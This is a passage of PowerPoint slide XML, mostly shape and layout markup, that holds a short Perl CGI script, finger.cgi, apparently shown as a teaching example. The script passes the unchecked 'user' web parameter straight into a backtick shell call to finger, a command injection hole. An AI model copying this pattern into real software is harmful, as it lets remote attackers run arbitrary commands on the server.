          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="object 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="5564905"/>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66" name="object 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="5564905"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198117"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="object 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="5763005"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="object 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="5763023"/>
            <a:ext cx="0" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197352"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="object 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="5763023"/>
            <a:ext cx="0" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197352"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="object 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="5960364"/>
            <a:ext cx="6769100" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="269748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="object 71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084832" y="2171191"/>
            <a:ext cx="6110605" cy="4000500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14604" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-309880">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/usr/bin/perl</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102235" marR="5080" indent="635">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>finger.cgi </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>finger </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script using Perl5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-430" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>module  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-309880">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="4"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-309880">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="4"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI::Carp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-105" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>qw(fatalsToBrowser);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102235" marR="1450975" indent="635">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="4"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="2479675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-95" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI;	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>create query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-215" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>object  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412115" indent="-309245">
              <a:lnSpc>
                <a:spcPts val="1465"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>display HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-180" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412115" indent="-309245">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;header,</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1033144" indent="-1033144">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="1033144" algn="l"/>
                <a:tab pos="1033780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;start_html('Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>User'),</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1033144" indent="-1033144">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="1033144" algn="l"/>
                <a:tab pos="1033780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;h1('Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-75" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>User');</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="4242435">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-114" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;pre&gt;";  13</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="413384" indent="-413384">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>display their finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-430" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-110" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;param("user");</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="2175510">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>`/usr/bin/finger </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-sh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-165" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user`;  17</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="1465"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="18"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>display HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-180" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>footer</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="413384" indent="-413384">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="18"/>
              <a:tabLst>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;/pre&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="18"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;end_html;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="object 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="6221145"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17780" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
